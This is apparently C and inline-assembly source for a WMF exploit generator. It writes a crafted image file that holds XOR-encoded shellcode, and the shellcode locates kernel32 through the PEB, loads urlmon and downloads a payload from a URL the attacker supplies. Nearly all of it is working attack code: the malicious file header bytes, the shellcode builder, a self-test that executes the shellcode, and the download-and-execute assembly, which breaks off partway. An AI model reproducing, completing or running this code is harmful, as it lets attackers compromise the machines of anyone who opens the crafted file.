	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x22, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0xDF, 0x01, 0x63, 0x02, 0x12, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65,
	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x0B, 0x00,
	0x08, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00,
	0x0C, 0x00, 0x05, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x09, 0x00,
	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0xD2, 0x01,
	0x0B, 0x00, 0x00, 0x00, 0x54, 0x52, 0x41, 0x49, 0x4C, 0x20, 0x3D, 0x20, 0x54, 0x4E, 0x46, 0x00,
	0x0D, 0x00, 0x10, 0x00, 0x10, 0x00, 0x07, 0x00, 0x0F, 0x00, 0x05, 0x00, 0x0C, 0x00, 0x06, 0x00,
	0x73, 0x00, 0x0F, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0xA7, 0x0A,
	0xF9, 0x01, 0x57, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
	0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0x5E, 0x02, 0x11, 0x00, 0x00, 0x00, 0x65, 0x65,
	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00,
	0x08, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00,
	0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x06, 0x00,
	0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x09, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xF9, 0x01, 0xF8, 0x02,
	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00,
	0x32, 0x0A, 0xF9, 0x01, 0x00, 0x03, 0x08, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
	0x65, 0x65, 0x06, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x0B, 0x00,
	0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x13, 0x02, 0xD2, 0x01,
	0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x06, 0x00, 0x05, 0x00, 0x0B, 0x00,
	0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0xAD, 0x00, 0x00, 0x00, 0x32, 0x0A,
	0x2C, 0x02, 0xD2, 0x01, 0x07, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x3D, 0x00,
	0x0D, 0x00, 0x10, 0x00, 0x0F, 0x00, 0x0E, 0x00, 0x0E, 0x00, 0x06, 0x00, 0x0C, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0xD8, 0x02, 0x01,
	0x01, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x32, 0x02, 0x03, 0x00, 0x00, 0x00,
	0x54, 0x64, 0x54, 0x00, 0x0E, 0x00, 0x0C, 0x00, 0x0D, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x59, 0x02, 0x01, 0x7D, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0xBA, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x61, 0x02, 0x08, 0x00,
	0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x11, 0x00, 0x0A, 0x00, 0x0C, 0x00,
	0x05, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0D, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0xBB, 0x02, 0x04, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65,
	0x0B, 0x00, 0x10, 0x00, 0x0D, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00,
	0x32, 0x0A, 0x2C, 0x02, 0xF6, 0x02, 0x08, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
	0x65, 0x65, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0C, 0x00,
	0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x43, 0x03,
	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00,
	0x32, 0x0A, 0x46, 0x02, 0xD2, 0x01, 0x09, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
	0x65, 0x65, 0x20, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00,
	0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x32, 0x0A,
	0x60, 0x02, 0xD2, 0x01, 0x04, 0x00, 0x00, 0x00, 0x7A, 0x56, 0x41, 0x44, 0x09, 0x00, 0x0F, 0x00,
	0x0F, 0x00, 0x10, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02,
	0x09, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0C, 0x3F,
	0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x0E, 0x02, 0x03, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x00,
	0x08, 0x00, 0x12, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x30, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A,
	0x60, 0x02, 0x38, 0x02, 0x01, 0x00, 0x00, 0x00, 0x3D, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
	0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x4A, 0x02, 0x11, 0x00, 0x00, 0x00, 0x65, 0x65,
	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00,
	0x0B, 0x00, 0x0B, 0x00, 0x0B, 0xAF, 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00,
	0x0A, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00,
	0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0xDD,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0xF6, 0x02,
	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00,
	0x32, 0x0A, 0x60, 0xEB, 0xFD, 0x02, 0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
	0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
	0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x34, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00,
	0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x3B, 0x03,
	0x07, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00, 0x0B, 0x00, 0x05, 0x00,
	0x0C, 0x00, 0x0C, 0x4F, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x7D, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0xF7, 0x62, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x31, 0x00, 0x00, 0xC3, 0x32, 0x0A, 0x79, 0x02, 0xD2, 0x01, 0x1C, 0x00,
	0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
	0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x0B, 0x00,
	0x08, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00,
	0x05, 0x00, 0x08, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x11, 0x00,
	0x0A, 0x00, 0x08, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00,
	0x0C, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x04, 0x00, 0x10, 0x00,
	0x00, 0x00, 0xFB, 0x02, 0x10, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00,
	0x00, 0xEE, 0x01, 0x02, 0x02, 0x22, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x00, 0xEE, 0x04, 0x00,
	0x00, 0x00, 0x2D, 0x01, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x0F, 0x00,
	0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
	0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00,
	0x00, 0x00, 0x00, 0x00
};


// Shellcode string
unsigned char  sc[1024] = {0};
unsigned int   Sc_len;

// ASM shellcode main function
void    ShellCode();

// Get function hash
static DWORD __stdcall GetHash ( char *c )
{
   DWORD h = 0;

   while ( *c )
   {
       __asm ror h, HASH_KEY

       h += *c++;
   }
   return( h );
}

void Make_ShellCode(char *url1)
{
   unsigned char  *pSc_addr;
   unsigned int   Enc_key=ENC_KEY;
   unsigned long  dwHash[100];
   unsigned int   dwHashSize;
   int i,j,k,l;


   // Get functions hash
   //printf("[+] Get functions hash strings.\r\n");
   for (i=0;;i++)
   {
       if (functions[i][0] == '\x0') break;

       dwHash[i] = GetHash((char*)functions[i]);
       //printf("\t%.8X\t%s\n", dwHash[i], functions[i]);
   }
   dwHashSize = i*4;


   // Deal with shellcode
   pSc_addr = (unsigned char *)ShellCode;

   for (k=0;k<MAX_SC_LEN;++k )
   {
       if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0)
       {
           break;
       }
   }
   pSc_addr+=(k+SEARCH_LEN);               // Start of the ShellCode

   for (k=0;k<MAX_SC_LEN;++k)
   {
       if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) {
           break;
       }
   }
   Sc_len=k;                               // Length of the ShellCode

   memcpy(sc, pSc_addr, Sc_len);           // Copy shellcode to sc[]


   // Add functions hash
   memcpy(sc+Sc_len, (char *)dwHash, dwHashSize);
   Sc_len += dwHashSize;

   // Add url
   memcpy(sc+Sc_len, url1, strlen(url1)+1);
   Sc_len += strlen(url1)+1;

   // Deal with find the right XOR byte
   for(i=0xff; i>0; i--)
   {
       l = 0;
       for(j=DECODE_LEN; j<Sc_len; j++)
       {
           if (
                  ((sc[j] ^ i) == 0x26) || //%
                  ((sc[j] ^ i) == 0x3d) || //=
                  ((sc[j] ^ i) == 0x3f) || //?
                  ((sc[j] ^ i) == 0x40) || //@
                  ((sc[j] ^ i) == 0x00) ||
                  ((sc[j] ^ i) == 0x0D) ||
                  ((sc[j] ^ i) == 0x0A)
               )                           // Define Bad Characters
           {
               l++;                        // If found the right XOR byte，l equals 0
               break;
           };
       }

       if (l==0)
       {
           Enc_key = i;

           printf("[+] Find XOR Byte: 0x%02X\n", i);
           for(j=DECODE_LEN; j<Sc_len; j++)
           {
               sc[j] ^= Enc_key;
           }

           break;                          // If found the right XOR byte, Break
       }
   }

   // Deal with not found XOR byte
   if (l!=0)
  {
       printf("[-] No xor byte found!\r\n");
       exit(-1);
   }

   // Deal with DeCode string
   *(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len;
   *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;

   printf("[+] download url:%s\n", url1);
}

int help()
{
       printf("Usage : wmf_expl.exe url [-t] \n");
       printf("    the 't' option will let you test for the shellcode first\n");
       exit(0);
}

void main(int argc, char **argv)
{
   WSADATA        wsa;
       unsigned char url[255]={0};
       BOOL b_test;
	   FILE *shellcode2;

	   FILE *file;
char data[333], x0r[70];
int size;
int ssz; //= 16036-size;

       b_test=FALSE;
       if(argc<2)
               help();

       strncpy(url, argv[1], 255);
		shellcode2 = fopen("shellcode.bin", "w+b"); // save to bin file...

       if(argc == 3)
               if(!strcmp(argv[2], "-t"))
                       b_test = TRUE;

   WSAStartup(MAKEWORD(2,2),&wsa);

   Make_ShellCode(url);

   size = sizeof(head1)+sizeof(head2)+strlen(sc);
	ssz = 16036 - size;
	
   file = fopen("xXx.UKT", "w+b");
	memset(x0r, 0x00, 70);
	memset(x0r, 0x90, ssz);

	fwrite(head1, sizeof(unsigned char), sizeof(head1), file);
fwrite(sc, sizeof(char), strlen(sc), file);
fprintf(file, "%s", x0r);
fwrite(head2, sizeof(unsigned char), sizeof(head2), file);
fclose(file);
   //printf("%d - %d\n", size, ssz);
   	fwrite(sc, 1, sizeof(sc)-1, shellcode2);
					fclose(shellcode2);
	//				printf("%d - size of shellcode\n", strlen(sc));
       if(b_test)
       {
               printf("Testing the shellcode...\n");
              //  printf("%s\n", sc); // shellcode in text mode =)
               ((void (*)(void)) &sc)(); // wanna test? =) put -t 8-)
       }
   return 0;
     } 

// ShellCode function
void ShellCode()
{
   __asm
   {
       PROC_BEGIN                          // C macro to begin proc
//--------------------------------------------------------------------
//
// DeCode
//
//--------------------------------------------------------------------
       jmp     short decode_end

decode_start:
       pop     ebx                         // Decode start addr (esp -> ebx)
       dec     ebx
       xor     ecx,ecx
       mov     cl,0xFF                     // Decode len

   decode_loop:
       xor     byte ptr [ebx+ecx],ENC_KEY     // Decode key
       loop    decode_loop
       jmp     short decode_ok

decode_end:
       call    decode_start

decode_ok:

//--------------------------------------------------------------------
//
// ShellCode
//
//--------------------------------------------------------------------
       jmp     sc_end

sc_start:
       pop     edi                         // Hash string start addr (esp -> edi)

       // Get kernel32.dll base addr
       mov     eax, fs:0x30                // PEB
       mov     eax, [eax+0x0c]             // PROCESS_MODULE_INFO
       mov     esi, [eax+0x1c]             // InInitOrder.flink
       lodsd                               // eax = InInitOrder.blink
       mov     ebp, [eax+8]                // ebp = kernel32.dll base address

       mov     esi, edi                    // Hash string start addr -> esi

       // Get function addr of kernel32
       push    4
       pop     ecx

   getkernel32:
       call    GetProcAddress_fun
       loop    getkernel32

       // Get function addr of urlmon
       push    0x00006e6f
       push    0x6d6c7275                 // urlmon
       push    esp
       call    ADDR_LoadLibraryA          // LoadLibraryA("urlmon");

